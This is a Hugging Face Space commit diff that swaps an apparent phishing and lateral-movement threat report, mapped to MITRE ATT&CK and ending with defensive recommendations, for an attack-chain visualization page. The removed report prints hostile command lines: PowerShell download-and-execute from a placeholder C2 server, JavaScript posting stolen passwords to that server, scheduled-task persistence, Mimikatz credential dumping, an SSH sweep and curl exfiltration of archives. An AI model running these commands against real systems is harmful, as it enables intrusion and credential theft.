Hugging Face's logo

Spaces:
capta1n
/
bas
Running

App Files Community
capta1n commited on
Commit
ddbe11e
·
verified ·
1 Parent(s): 22306da

Add 1 files

Browse files
Files changed (1) hide show
  1. index.html +529 -421
index.html CHANGED
@@ -3,476 +3,584 @@
3
  <head>
4
  <meta charset="UTF-8">
5
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
6
- <title>Advanced Phishing & Lateral Movement Attack Report</title>
7
  <script src="https://cdn.tailwindcss.com"></script>
8
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
9
  <style>
10
- .timeline-item:not(:last-child)::after {
11
- content: '';
12
  position: absolute;
13
- left: 24px;
14
- top: 32px;
15
- height: calc(100% - 32px);
16
- width: 2px;
17
  background-color: #e5e7eb;
 
18
  }
19
- .attack-step {
20
  transition: all 0.3s ease;
 
21
  }
22
- .attack-step:hover {
23
- transform: translateY(-2px);
24
  box-shadow: 0 10px 15px -3px rgba(0, 0, 0, 0.1);
25
  }
26
- .code-block {
27
- font-family: 'Courier New', monospace;
28
- background-color: #f8f9fa;
29
- border-left: 3px solid #3b82f6;
30
- padding: 0.75rem;
31
- overflow-x: auto;
32
  }
33
- .mitre-tag {
34
- display: inline-flex;
35
- align-items: center;
36
- padding: 0.25rem 0.5rem;
37
- border-radius: 9999px;
38
- font-size: 0.75rem;
39
- font-weight: 600;
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
40
  }
41
  </style>
42
  </head>
43
- <body class="bg-gray-50">
44
- <div class="container mx-auto px-4 py-8 max-w-5xl">
45
- <!-- Header -->
46
- <div class="flex flex-col md:flex-row justify-between items-start md:items-center mb-8">
47
- <div>
48
- <h1 class="text-3xl font-bold text-gray-800">Advanced Phishing & Lateral Movement Attack Report</h1>
49
- <p class="text-gray-600 mt-2">Detailed analysis of a sophisticated attack chain targeting internal credentials</p>
 
 
 
50
  </div>
51
- <div class="mt-4 md:mt-0 bg-white p-3 rounded-lg shadow-sm border border-gray-200">
52
- <div class="flex items-center">
53
- <div class="bg-red-100 p-2 rounded-full mr-3">
54
- <i class="fas fa-shield-alt text-red-500"></i>
55
- </div>
56
- <div>
57
- <p class="text-xs text-gray-500">Threat Level</p>
58
- <p class="font-semibold text-red-600">Critical</p>
59
- </div>
60
- </div>
61
  </div>
62
- </div>
63
-
64
- <!-- Executive Summary -->
65
- <div class="bg-white p-6 rounded-lg shadow-sm border border-gray-200 mb-8">
66
- <h2 class="text-2xl font-bold text-gray-800 mb-4">Executive Summary</h2>
67
- <div class="grid grid-cols-1 md:grid-cols-3 gap-4 mb-4">
68
- <div class="bg-blue-50 p-4 rounded-lg">
69
- <h3 class="font-semibold text-gray-800 mb-2">Attack Vector</h3>
70
- <p class="text-sm text-gray-600">Spear phishing with malicious documents/links</p>
71
- </div>
72
- <div class="bg-purple-50 p-4 rounded-lg">
73
- <h3 class="font-semibold text-gray-800 mb-2">Primary Target</h3>
74
- <p class="text-sm text-gray-600">Internal SSH credentials & sensitive documents</p>
75
- </div>
76
- <div class="bg-red-50 p-4 rounded-lg">
77
- <h3 class="font-semibold text-gray-800 mb-2">Impact</h3>
78
- <p class="text-sm text-gray-600">Full internal network compromise possible</p>
79
- </div>
80
  </div>
81
- <p class="text-gray-700">
82
- This report details a sophisticated attack chain beginning with carefully crafted phishing emails, leading to C2 implantation, credential theft, and lateral movement through internal networks. The attacker demonstrates advanced techniques including domain spoofing, malicious macros, C2 infrastructure obfuscation, and browser session hijacking.
83
- </p>
84
  </div>
85
-
86
- <!-- Timeline -->
87
- <div class="relative">
88
- <!-- Phase 1: Initial Compromise -->
89
- <div class="relative timeline-item pl-16 pb-8">
90
- <div class="absolute left-0 top-0 flex items-center justify-center w-12 h-12 rounded-full bg-blue-500 text-white font-bold z-10">
91
- 1
92
- </div>
93
- <div class="attack-step bg-white p-6 rounded-lg shadow-sm border border-gray-200">
94
- <div class="flex justify-between items-start">
95
- <div>
96
- <h3 class="font-bold text-lg text-gray-800">Initial Compromise</h3>
97
- <p class="text-gray-600 mt-1">Spear Phishing Campaign</p>
98
- </div>
99
- <span class="mitre-tag bg-blue-100 text-blue-800">
100
- <i class="fas fa-envelope mr-1"></i> T1566.001
101
- </span>
102
- </div>
103
- <div class="mt-4">
104
- <div class="flex items-start">
105
- <div class="bg-gray-100 p-2 rounded-full mr-3 mt-1">
106
- <i class="fas fa-user-secret text-gray-600"></i>
107
- </div>
108
- <div>
109
- <h4 class="font-medium text-gray-700">Attack Details</h4>
110
- <ul class="list-disc pl-5 text-sm text-gray-600 mt-1 space-y-1">
111
- <li>Email subjects: "紧急通知:阿里云账号异常登录提醒" or "内部会议纪要(机密)"</li>
112
- <li>Body mimics official Alibaba Cloud communications</li>
113
- <li>Contains either malicious attachment or phishing link</li>
114
- </ul>
115
-
116
- <h4 class="font-medium text-gray-700 mt-3">Technical Indicators</h4>
117
- <div class="code-block mt-2">
118
- <p>Attachment: 阿里云安全报告_v2023.pdf (malicious macro)</p>
119
- <p>Phishing URL: https://aliyun-support[.]com/verify</p>
120
- <p>Spoofed sender: security@alibaba-inc.com</p>
121
- <p>Typosquatting domain: al1baba-inc[.]com</p>
122
- </div>
123
- </div>
124
- </div>
125
- </div>
126
- </div>
127
  </div>
128
-
129
- <!-- Phase 2: Execution -->
130
- <div class="relative timeline-item pl-16 pb-8">
131
- <div class="absolute left-0 top-0 flex items-center justify-center w-12 h-12 rounded-full bg-blue-500 text-white font-bold z-10">
132
- 2
133
- </div>
134
- <div class="attack-step bg-white p-6 rounded-lg shadow-sm border border-gray-200">
135
- <div class="flex justify-between items-start">
136
- <div>
137
- <h3 class="font-bold text-lg text-gray-800">Execution</h3>
138
- <p class="text-gray-600 mt-1">Malicious Payload Delivery</p>
139
- </div>
140
- <span class="mitre-tag bg-purple-100 text-purple-800">
141
- <i class="fas fa-code mr-1"></i> T1059.001
142
- </span>
143
- </div>
144
- <div class="mt-4">
145
- <div class="grid grid-cols-1 md:grid-cols-2 gap-4">
146
- <div>
147
- <h4 class="font-medium text-gray-700">Malicious Document</h4>
148
- <div class="code-block mt-2">
149
- <p>Macro code:</p>
150
- <p>powershell IEX (New-Object Net.WebClient).DownloadString('http://C2-SERVER/payload.ps1')</p>
151
- </div>
152
- <p class="text-sm text-gray-600 mt-2">Downloads and executes Cobalt Strike payload</p>
153
- </div>
154
- <div>
155
- <h4 class="font-medium text-gray-700">Phishing Site</h4>
156
- <div class="code-block mt-2">
157
- <p>JavaScript credential theft:</p>
158
- <p>fetch('http://C2-SERVER/steal', {</p>
159
- <p> method: 'POST',</p>
160
- <p> body: JSON.stringify({user: username, pass: password})</p>
161
- <p>});</p>
162
- </div>
163
- <p class="text-sm text-gray-600 mt-2">Perfect replica of Alibaba Cloud login</p>
164
- </div>
165
- </div>
166
- </div>
167
  </div>
 
 
168
  </div>
169
-
170
- <!-- Phase 3: Persistence -->
171
- <div class="relative timeline-item pl-16 pb-8">
172
- <div class="absolute left-0 top-0 flex items-center justify-center w-12 h-12 rounded-full bg-blue-500 text-white font-bold z-10">
173
- 3
174
- </div>
175
- <div class="attack-step bg-white p-6 rounded-lg shadow-sm border border-gray-200">
176
- <div class="flex justify-between items-start">
177
- <div>
178
- <h3 class="font-bold text-lg text-gray-800">Persistence</h3>
179
- <p class="text-gray-600 mt-1">C2 Infrastructure Establishment</p>
180
- </div>
181
- <span class="mitre-tag bg-red-100 text-red-800">
182
- <i class="fas fa-server mr-1"></i> T1572
183
- </span>
184
- </div>
185
- <div class="mt-4">
186
- <div class="grid grid-cols-1 md:grid-cols-2 gap-4">
187
- <div>
188
- <h4 class="font-medium text-gray-700">C2 Configuration</h4>
189
- <div class="code-block mt-2">
190
- <p>Cobalt Strike listener:</p>
191
- <p>windows/x64/reflective PE</p>
192
- <p>HTTPS with valid certificate</p>
193
- <p>Multiple IP rotation via CDN</p>
194
- </div>
195
- </div>
196
- <div>
197
- <h4 class="font-medium text-gray-700">Persistence Methods</h4>
198
- <div class="code-block mt-2">
199
- <p>Registry:</p>
200
- <p>HKCU\Software\Microsoft\Windows\CurrentVersion\Run</p>
201
- <p>Task Scheduler:</p>
202
- <p>schtasks /create /tn "Windows Update" /tr "C:\Windows\System32\malicious.exe"</p>
203
- </div>
204
- </div>
205
- </div>
206
- </div>
207
  </div>
 
 
208
  </div>
209
-
210
- <!-- Phase 4: Credential Access -->
211
- <div class="relative timeline-item pl-16 pb-8">
212
- <div class="absolute left-0 top-0 flex items-center justify-center w-12 h-12 rounded-full bg-blue-500 text-white font-bold z-10">
213
- 4
214
- </div>
215
- <div class="attack-step bg-white p-6 rounded-lg shadow-sm border border-gray-200">
216
- <div class="flex justify-between items-start">
217
- <div>
218
- <h3 class="font-bold text-lg text-gray-800">Credential Access</h3>
219
- <p class="text-gray-600 mt-1">SSH & Browser Credential Theft</p>
220
- </div>
221
- <span class="mitre-tag bg-yellow-100 text-yellow-800">
222
- <i class="fas fa-key mr-1"></i> T1555
223
- </span>
224
- </div>
225
- <div class="mt-4">
226
- <div class="grid grid-cols-1 md:grid-cols-2 gap-4">
227
- <div>
228
- <h4 class="font-medium text-gray-700">Credential Harvesting</h4>
229
- <div class="code-block mt-2">
230
- <p>Browser cookies:</p>
231
- <p>Mimikatz !sekurlsa::logonpasswords</p>
232
- <p>SSH keys:</p>
233
- <p>search C:\Users\*\.ssh\id_rsa</p>
234
- </div>
235
- </div>
236
- <div>
237
- <h4 class="font-medium text-gray-700">Credential Storage</h4>
238
- <div class="code-block mt-2">
239
- <p>Windows Credential Manager:</p>
240
- <p>cmdkey /list</p>
241
- <p>SSH config files:</p>
242
- <p>C:\Users\*\.ssh\config</p>
243
- </div>
244
- </div>
245
- </div>
246
- </div>
247
  </div>
 
 
248
  </div>
249
-
250
- <!-- Phase 5: Lateral Movement -->
251
- <div class="relative timeline-item pl-16 pb-8">
252
- <div class="absolute left-0 top-0 flex items-center justify-center w-12 h-12 rounded-full bg-blue-500 text-white font-bold z-10">
253
- 5
254
  </div>
255
- <div class="attack-step bg-white p-6 rounded-lg shadow-sm border border-gray-200">
256
- <div class="flex justify-between items-start">
257
- <div>
258
- <h3 class="font-bold text-lg text-gray-800">Lateral Movement</h3>
259
- <p class="text-gray-600 mt-1">Internal Network Penetration</p>
260
- </div>
261
- <span class="mitre-tag bg-orange-100 text-orange-800">
262
- <i class="fas fa-arrows-alt-h mr-1"></i> T1021
263
- </span>
264
- </div>
265
- <div class="mt-4">
266
- <div class="grid grid-cols-1 md:grid-cols-2 gap-4">
267
- <div>
268
- <h4 class="font-medium text-gray-700">SSH Access</h4>
269
- <div class="code-block mt-2">
270
- <p>ssh -i id_rsa user@10.0.0.5</p>
271
- <p>plink.exe -ssh -P 22 -i id_rsa user@10.0.0.6</p>
272
- </div>
273
- <p class="text-sm text-gray-600 mt-2">Using stolen credentials for access</p>
274
- </div>
275
- <div>
276
- <h4 class="font-medium text-gray-700">Internal Recon</h4>
277
- <div class="code-block mt-2">
278
- <p>nmap -sS 10.0.0.0/24</p>
279
- <p>for ip in {1..254}; do ssh -o ConnectTimeout=1 user@10.0.0.$ip; done</p>
280
- </div>
281
- <p class="text-sm text-gray-600 mt-2">Scanning for additional targets</p>
282
- </div>
283
- </div>
284
- </div>
285
  </div>
 
 
286
  </div>
287
-
288
- <!-- Phase 6: Exfiltration -->
289
- <div class="relative timeline-item pl-16">
290
- <div class="absolute left-0 top-0 flex items-center justify-center w-12 h-12 rounded-full bg-blue-500 text-white font-bold z-10">
291
- 6
292
  </div>
293
- <div class="attack-step bg-white p-6 rounded-lg shadow-sm border border-gray-200">
294
- <div class="flex justify-between items-start">
295
- <div>
296
- <h3 class="font-bold text-lg text-gray-800">Exfiltration</h3>
297
- <p class="text-gray-600 mt-1">Data Collection & Exfiltration</p>
298
- </div>
299
- <span class="mitre-tag bg-green-100 text-green-800">
300
- <i class="fas fa-cloud-download-alt mr-1"></i> T1041
301
- </span>
302
- </div>
303
- <div class="mt-4">
304
- <div class="grid grid-cols-1 md:grid-cols-2 gap-4">
305
- <div>
306
- <h4 class="font-medium text-gray-700">Browser Proxy</h4>
307
- <div class="code-block mt-2">
308
- <p>proxychains4 -q -f /path/to/config.txt firefox</p>
309
- <p>Proxy config: 1.2.3.4:8080</p>
310
- </div>
311
- <p class="text-sm text-gray-600 mt-2">MITM for internal application access</p>
312
- </div>
313
- <div>
314
- <h4 class="font-medium text-gray-700">Data Theft</h4>
315
- <div class="code-block mt-2">
316
- <p>Target files:</p>
317
- <p>*.pem, *.key, *.sql, *.db</p>
318
- <p>Exfiltration:</p>
319
- <p>split -b 5MB sensitive.tar.gz | curl -X POST -F 'file=@-' http://C2-SERVER/upload</p>
320
- </div>
321
- </div>
322
- </div>
323
- </div>
324
  </div>
 
 
325
  </div>
326
- </div>
327
-
328
- <!-- MITRE ATT&CK Mapping -->
329
- <div class="mt-12 bg-white p-6 rounded-lg shadow-sm border border-gray-200">
330
- <h2 class="text-2xl font-bold text-gray-800 mb-4">MITRE ATT&CK Mapping</h2>
331
 
332
- <div class="overflow-x-auto">
333
- <table class="min-w-full divide-y divide-gray-200">
334
- <thead class="bg-gray-50">
335
- <tr>
336
- <th scope="col" class="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">Tactic</th>
337
- <th scope="col" class="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">Technique</th>
338
- <th scope="col" class="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">ID</th>
339
- <th scope="col" class="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">Description</th>
340
- </tr>
341
- </thead>
342
- <tbody class="bg-white divide-y divide-gray-200">
343
- <tr>
344
- <td class="px-6 py-4 whitespace-nowrap text-sm font-medium text-gray-900">Initial Access</td>
345
- <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">Spearphishing Attachment</td>
346
- <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">T1566.001</td>
347
- <td class="px-6 py-4 text-sm text-gray-500">Malicious documents sent via email</td>
348
- </tr>
349
- <tr>
350
- <td class="px-6 py-4 whitespace-nowrap text-sm font-medium text-gray-900">Execution</td>
351
- <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">PowerShell</td>
352
- <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">T1059.001</td>
353
- <td class="px-6 py-4 text-sm text-gray-500">Macro executes PowerShell payload</td>
354
- </tr>
355
- <tr>
356
- <td class="px-6 py-4 whitespace-nowrap text-sm font-medium text-gray-900">Persistence</td>
357
- <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">Registry Run Keys</td>
358
- <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">T1547.001</td>
359
- <td class="px-6 py-4 text-sm text-gray-500">Adds malicious executable to startup</td>
360
- </tr>
361
- <tr>
362
- <td class="px-6 py-4 whitespace-nowrap text-sm font-medium text-gray-900">Credential Access</td>
363
- <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">Credentials from Password Stores</td>
364
- <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">T1555</td>
365
- <td class="px-6 py-4 text-sm text-gray-500">Harvests SSH keys and browser cookies</td>
366
- </tr>
367
- <tr>
368
- <td class="px-6 py-4 whitespace-nowrap text-sm font-medium text-gray-900">Lateral Movement</td>
369
- <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">Remote Services: SSH</td>
370
- <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">T1021.004</td>
371
- <td class="px-6 py-4 text-sm text-gray-500">Uses stolen SSH keys for access</td>
372
- </tr>
373
- <tr>
374
- <td class="px-6 py-4 whitespace-nowrap text-sm font-medium text-gray-900">Exfiltration</td>
375
- <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">Exfiltration Over C2 Channel</td>
376
- <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">T1041</td>
377
- <td class="px-6 py-4 text-sm text-gray-500">Data sent through established C2</td>
378
- </tr>
379
- </tbody>
380
- </table>
381
  </div>
382
- </div>
383
-
384
- <!-- Recommendations -->
385
- <div class="mt-8 bg-white p-6 rounded-lg shadow-sm border border-gray-200">
386
- <h2 class="text-2xl font-bold text-gray-800 mb-4">Defensive Recommendations</h2>
387
 
388
- <div class="space-y-4">
389
- <div class="flex items-start">
390
- <div class="bg-blue-500 text-white text-xs font-bold rounded-full w-6 h-6 flex items-center justify-center mr-3 mt-1">
391
- 1
392
- </div>
393
- <div>
394
- <h3 class="font-medium text-gray-800">Enhanced Email Security</h3>
395
- <ul class="list-disc pl-5 text-sm text-gray-600 mt-1 space-y-1">
396
- <li>Implement DMARC/DKIM/SPF to prevent sender spoofing</li>
397
- <li>Deploy advanced attachment sandboxing for macro analysis</li>
398
- <li>User training on identifying typosquatting domains</li>
399
- </ul>
400
- </div>
401
  </div>
402
-
403
- <div class="flex items-start">
404
- <div class="bg-blue-500 text-white text-xs font-bold rounded-full w-6 h-6 flex items-center justify-center mr-3 mt-1">
405
- 2
406
- </div>
407
- <div>
408
- <h3 class="font-medium text-gray-800">Endpoint Protection</h3>
409
- <ul class="list-disc pl-5 text-sm text-gray-600 mt-1 space-y-1">
410
- <li>Block Office macros from the internet zone</li>
411
- <li>Monitor for suspicious PowerShell execution patterns</li>
412
- <li>Implement application whitelisting for executables</li>
413
- </ul>
414
- </div>
 
 
 
 
 
 
 
415
  </div>
416
-
417
- <div class="flex items-start">
418
- <div class="bg-blue-500 text-white text-xs font-bold rounded-full w-6 h-6 flex items-center justify-center mr-3 mt-1">
419
- 3
420
- </div>
421
- <div>
422
- <h3 class="font-medium text-gray-800">Credential Protection</h3>
423
- <ul class="list-disc pl-5 text-sm text-gray-600 mt-1 space-y-1">
424
- <li>Enforce MFA for all SSH access</li>
425
- <li>Regular rotation of SSH keys with automated monitoring</li>
426
- <li>Credential guard for browser session protection</li>
 
 
 
 
 
 
 
427
  </ul>
428
  </div>
429
  </div>
430
-
431
- <div class="flex items-start">
432
- <div class="bg-blue-500 text-white text-xs font-bold rounded-full w-6 h-6 flex items-center justify-center mr-3 mt-1">
433
- 4
434
- </div>
435
- <div>
436
- <h3 class="font-medium text-gray-800">Network Monitoring</h3>
437
- <ul class="list-disc pl-5 text-sm text-gray-600 mt-1 space-y-1">
438
- <li>Detect unusual SSH login patterns (time/location)</li>
439
- <li>Monitor for internal systems communicating with external IPs</li>
440
- <li>Implement network segmentation for critical assets</li>
441
- </ul>
442
  </div>
443
  </div>
444
  </div>
445
  </div>
446
  </div>
447
 
448
- <footer class="bg-gray-100 border-t border-gray-200 py-6 mt-12">
449
- <div class="container mx-auto px-4 text-center text-gray-500 text-sm">
450
- <p>Advanced Phishing & Lateral Movement Attack Report | Generated on <span id="current-date"></span></p>
451
- <p class="mt-1">Confidential - For authorized personnel only</p>
452
- </div>
453
- </footer>
454
-
455
  <script>
456
- // Set current date
457
- const now = new Date();
458
- const options = { year: 'numeric', month: 'long', day: 'numeric', hour: '2-digit', minute: '2-digit' };
459
- document.getElementById('current-date').textContent = now.toLocaleDateString('en-US', options);
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
460
 
461
- // Add animation to attack steps
462
- const observer = new IntersectionObserver((entries) => {
463
- entries.forEach(entry => {
464
- if (entry.isIntersecting) {
465
- entry.target.style.opacity = '1';
466
- entry.target.style.transform = 'translateY(0)';
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
467
  }
468
  });
469
- }, { threshold: 0.1 });
470
-
471
- document.querySelectorAll('.attack-step').forEach(step => {
472
- step.style.opacity = '0';
473
- step.style.transform = 'translateY(20px)';
474
- step.style.transition = 'all 0.4s ease-out';
475
- observer.observe(step);
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
476
  });
477
  </script>
478
  <p style="border-radius: 8px; text-align: center; font-size: 12px; color: #fff; margin-top: 16px;position: fixed; left: 8px; bottom: 8px; z-index: 10; background: rgba(0, 0, 0, 0.8); padding: 4px 8px;">Made with <img src="https://enzostvs-deepsite.hf.space/logo.svg" alt="DeepSite Logo" style="width: 16px; height: 16px; vertical-align: middle;display:inline-block;margin-right:3px;filter:brightness(0) invert(1);"><a href="https://enzostvs-deepsite.hf.space" style="color: #fff;text-decoration: underline;" target="_blank" >DeepSite</a> - 🧬 <a href="https://enzostvs-deepsite.hf.space?remix=capta1n/bas" style="color: #fff;text-decoration: underline;" target="_blank" >Remix</a></p></body>
 
3
  <head>
4
  <meta charset="UTF-8">
5
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
6
+ <title>Advanced Phishing Attack Sandbox Visualization</title>
7
  <script src="https://cdn.tailwindcss.com"></script>
8
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
9
  <style>
10
+ .network-line {
 
11
  position: absolute;
 
 
 
 
12
  background-color: #e5e7eb;
13
+ z-index: 0;
14
  }
15
+ .attack-node {
16
  transition: all 0.3s ease;
17
+ z-index: 1;
18
  }
19
+ .attack-node:hover {
20
+ transform: scale(1.05);
21
  box-shadow: 0 10px 15px -3px rgba(0, 0, 0, 0.1);
22
  }
23
+ .malicious {
24
+ border: 2px solid #ef4444;
 
 
 
 
25
  }
26
+ .compromised {
27
+ border: 2px solid #f59e0b;
28
+ }
29
+ .critical {
30
+ border: 2px solid #ef4444;
31
+ }
32
+ .data-flow {
33
+ stroke-dasharray: 5;
34
+ animation: dash 30s linear infinite;
35
+ }
36
+ @keyframes dash {
37
+ to {
38
+ stroke-dashoffset: -1000;
39
+ }
40
+ }
41
+ .tooltip {
42
+ position: absolute;
43
+ padding: 8px;
44
+ background: rgba(0, 0, 0, 0.8);
45
+ color: white;
46
+ border-radius: 4px;
47
+ pointer-events: none;
48
+ font-size: 12px;
49
+ z-index: 100;
50
+ max-width: 300px;
51
  }
52
  </style>
53
  </head>
54
+ <body class="bg-gray-100">
55
+ <div class="container mx-auto px-4 py-8">
56
+ <h1 class="text-3xl font-bold text-center text-gray-800 mb-2">Advanced Phishing Attack Sandbox</h1>
57
+ <p class="text-center text-gray-600 mb-8">Visualization of the complete attack kill chain from initial compromise to data exfiltration</p>
58
+
59
+ <!-- Attack Legend -->
60
+ <div class="bg-white rounded-lg shadow-md p-4 mb-8 grid grid-cols-1 md:grid-cols-4 gap-4">
61
+ <div class="flex items-center">
62
+ <div class="w-4 h-4 rounded-full bg-red-500 mr-2"></div>
63
+ <span class="text-sm">Attacker Infrastructure</span>
64
  </div>
65
+ <div class="flex items-center">
66
+ <div class="w-4 h-4 rounded-full bg-blue-500 mr-2"></div>
67
+ <span class="text-sm">Victim Assets</span>
 
 
 
 
 
 
 
68
  </div>
69
+ <div class="flex items-center">
70
+ <div class="w-4 h-4 rounded-full bg-yellow-500 mr-2"></div>
71
+ <span class="text-sm">Compromised Systems</span>
72
+ </div>
73
+ <div class="flex items-center">
74
+ <div class="w-4 h-4 rounded-full bg-green-500 mr-2"></div>
75
+ <span class="text-sm">Data Exfiltration</span>
 
 
 
 
 
 
 
 
 
 
 
76
  </div>
 
 
 
77
  </div>
78
+
79
+ <!-- Sandbox Visualization -->
80
+ <div class="relative bg-white rounded-xl shadow-lg p-6 h-[600px] overflow-hidden border border-gray-200">
81
+ <!-- Background Network Lines -->
82
+ <div class="absolute inset-0 opacity-20">
83
+ <div class="absolute left-1/4 top-0 bottom-0 w-px bg-gray-300"></div>
84
+ <div class="absolute left-2/4 top-0 bottom-0 w-px bg-gray-300"></div>
85
+ <div class="absolute left-3/4 top-0 bottom-0 w-px bg-gray-300"></div>
86
+ <div class="absolute top-1/3 left-0 right-0 h-px bg-gray-300"></div>
87
+ <div class="absolute top-2/3 left-0 right-0 h-px bg-gray-300"></div>
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
88
  </div>
89
+
90
+ <!-- Attacker Infrastructure -->
91
+ <div id="attacker" class="attack-node absolute left-[10%] top-[15%] bg-red-50 p-4 rounded-lg shadow-sm border-2 border-red-300 w-[160px] text-center">
92
+ <div class="bg-red-100 p-3 rounded-full inline-block mb-2">
93
+ <i class="fas fa-user-secret text-red-600 text-xl"></i>
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
94
  </div>
95
+ <h3 class="font-bold text-red-800">Attacker</h3>
96
+ <p class="text-xs text-red-600 mt-1">C2: 185.143.223.47</p>
97
  </div>
98
+
99
+ <!-- Phishing Server -->
100
+ <div id="phishing" class="attack-node absolute left-[10%] top-[40%] bg-red-50 p-4 rounded-lg shadow-sm border-2 border-red-300 w-[160px] text-center">
101
+ <div class="bg-red-100 p-3 rounded-full inline-block mb-2">
102
+ <i class="fas fa-server text-red-600 text-xl"></i>
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
103
  </div>
104
+ <h3 class="font-bold text-red-800">Phishing Server</h3>
105
+ <p class="text-xs text-red-600 mt-1">aliyun-support[.]com</p>
106
  </div>
107
+
108
+ <!-- Malicious Document -->
109
+ <div id="document" class="attack-node absolute left-[10%] top-[65%] bg-red-50 p-4 rounded-lg shadow-sm border-2 border-red-300 w-[160px] text-center">
110
+ <div class="bg-red-100 p-3 rounded-full inline-block mb-2">
111
+ <i class="fas fa-file-word text-red-600 text-xl"></i>
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
112
  </div>
113
+ <h3 class="font-bold text-red-800">Malicious Doc</h3>
114
+ <p class="text-xs text-red-600 mt-1">阿里云安全报告_v2023.pdf</p>
115
  </div>
116
+
117
+ <!-- Victim -->
118
+ <div id="victim" class="attack-node absolute left-[35%] top-[40%] bg-blue-50 p-4 rounded-lg shadow-sm border-2 border-blue-300 w-[160px] text-center">
119
+ <div class="bg-blue-100 p-3 rounded-full inline-block mb-2">
120
+ <i class="fas fa-user text-blue-600 text-xl"></i>
121
  </div>
122
+ <h3 class="font-bold text-blue-800">Employee</h3>
123
+ <p class="text-xs text-blue-600 mt-1">user@company.com</p>
124
+ </div>
125
+
126
+ <!-- Compromised Workstation -->
127
+ <div id="workstation" class="attack-node absolute left-[60%] top-[40%] bg-yellow-50 p-4 rounded-lg shadow-sm border-2 border-yellow-300 w-[160px] text-center compromised">
128
+ <div class="bg-yellow-100 p-3 rounded-full inline-block mb-2">
129
+ <i class="fas fa-laptop-code text-yellow-600 text-xl"></i>
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
130
  </div>
131
+ <h3 class="font-bold text-yellow-800">Workstation</h3>
132
+ <p class="text-xs text-yellow-600 mt-1">Cobalt Strike Beacon</p>
133
  </div>
134
+
135
+ <!-- Internal SSH Server -->
136
+ <div id="ssh-server" class="attack-node absolute left-[60%] top-[15%] bg-blue-50 p-4 rounded-lg shadow-sm border-2 border-blue-300 w-[160px] text-center">
137
+ <div class="bg-blue-100 p-3 rounded-full inline-block mb-2">
138
+ <i class="fas fa-shield-alt text-blue-600 text-xl"></i>
139
  </div>
140
+ <h3 class="font-bold text-blue-800">SSH Server</h3>
141
+ <p class="text-xs text-blue-600 mt-1">10.0.0.5</p>
142
+ </div>
143
+
144
+ <!-- Compromised SSH Server -->
145
+ <div id="compromised-ssh" class="attack-node absolute left-[60%] top-[15%] bg-yellow-50 p-4 rounded-lg shadow-sm border-2 border-yellow-300 w-[160px] text-center compromised hidden">
146
+ <div class="bg-yellow-100 p-3 rounded-full inline-block mb-2">
147
+ <i class="fas fa-shield-alt text-yellow-600 text-xl"></i>
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
148
  </div>
149
+ <h3 class="font-bold text-yellow-800">SSH Server</h3>
150
+ <p class="text-xs text-yellow-600 mt-1">10.0.0.5 (Compromised)</p>
151
  </div>
 
 
 
 
 
152
 
153
+ <!-- Internal Database -->
154
+ <div id="database" class="attack-node absolute left-[85%] top-[40%] bg-blue-50 p-4 rounded-lg shadow-sm border-2 border-blue-300 w-[160px] text-center">
155
+ <div class="bg-blue-100 p-3 rounded-full inline-block mb-2">
156
+ <i class="fas fa-database text-blue-600 text-xl"></i>
157
+ </div>
158
+ <h3 class="font-bold text-blue-800">Database</h3>
159
+ <p class="text-xs text-blue-600 mt-1">10.0.1.10</p>
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
